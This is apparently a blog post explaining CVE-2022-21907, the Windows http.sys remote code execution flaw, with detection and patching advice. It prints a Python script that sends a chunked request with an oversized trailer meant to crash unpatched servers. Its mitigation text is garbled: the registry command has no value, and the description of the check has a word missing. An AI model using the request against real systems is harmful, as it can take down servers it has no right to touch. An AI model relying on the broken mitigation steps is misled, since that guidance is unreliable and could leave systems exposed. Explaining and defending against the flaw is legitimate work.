In January 2022, Microsoft disclosed a dangerous vulnerability dubbed CVE-2022-21907 affecting the Windows HTTP Protocol Stack, also known as http.sys. This bug is particularly alarming because it allows remote attackers to execute code on unpatched systems—no authentication required. In this post, we’ll break down what this vulnerability is, how it works, and what you can do to protect your systems.
What is http.sys and Why Should You Care?
http.sys is a core Windows component that handles HTTP requests at a very low system level. It powers web servers like IIS (Internet Information Services), but even Windows roles like Remote Desktop Web, WinRM, and service endpoints use it.
Per Microsoft
> The vulnerability allows remote code execution in the Windows HTTP protocol stack. An unauthenticated attacker could send specially crafted packets to a vulnerable server utilizing the HTTP Protocol Stack (http.sys) to process packets.
(Microsoft Security Guide Reference)
How the Exploit Works
The culprit is HTTP Trailer Support. This feature, if enabled, lets clients send additional HTTP headers after the message body in a request (trailers). Windows mishandles these in certain versions, letting an attacker overflow buffers or corrupt memory—potentially running their code with SYSTEM privileges.
Sample Malicious Request (in Python)
import socket
payload = (
"POST / HTTP/1.1\r\n"
"Host: vulnerable.server\r\n"
"Transfer-Encoding: chunked\r\n"
"Trailer: ExploitHeader\r\n"
"\r\n"
"1\r\n"
"A\r\n"
"\r\n"
"ExploitHeader: " + "A" * 10000 + "\r\n"
"\r\n"
)
with socket.create_connection(("vulnerable.server", 80)) as sock:
sock.sendall(payload.encode())
ExploitHeader: "A" * 10000 sends an enormous trailer to trigger the bug.
*Running this against an unpatched Windows 10 or Server 2019 can crash the system—or worse, execute attacker code.*
Windows Servers with http.sys-based web services running.
- Systems with HTTP Trailers feature enabled by default (Windows Server 2019, 2022, Windows 10 v1809+, etc.)
Proof-of-concept (PoC) exploits have surfaced
- WatchTowr PoC
- Tenable Research Analysis & PoC
Most public PoCs cause a denial-of-service (DoS) (crash), but advanced attacks could achieve full remote code execution.
1. Do You Use HTTP Trailers?
By default, Windows Server 2019 and 2022 have it enabled. You can check with this PowerShell command:
Get-ItemPropertyValue HKLM:\System\CurrentControlSet\Services\HTTP\Parameters -Name EnableTrailerSupport
1 means enabled.
or missing means disabled.
Check services listening on port 80 or 443
netsh http show servicestate
1. Install Microsoft patches (January 2022 or later)
- Download security updates here
Set registry key and reboot
New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Services\HTTP\Parameters" -Name "EnableTrailerSupport" -Value -PropertyType DWord -Force
Restart-Computer
Key References
- Microsoft Security Advisory
- Tenable Research Deep Dive
- NVD Record
- WatchTowr PoC
Final Thoughts
CVE-2022-21907 is a Big Deal in the Windows world—if you haven’t patched your servers since early 2022, you might still be at risk. Because the vulnerability doesn’t require authentication, it’s especially dangerous for exposed web servers.
Patch now. Double-check rare/legacy Windows servers. For large deployments, consider disabling HTTP Trailers until every machine is patched. If you’re a defender, monitor your logs for suspicious chunked requests like the ones above.
Stay safe—don’t let remote attackers turn your servers against you!
Have more questions about CVE-2022-21907 or want to see related exploits? Leave a comment below.
Timeline
Published on: 01/11/2022 21:15:00 UTC
Last modified on: 08/20/2022 17:15:00 UTC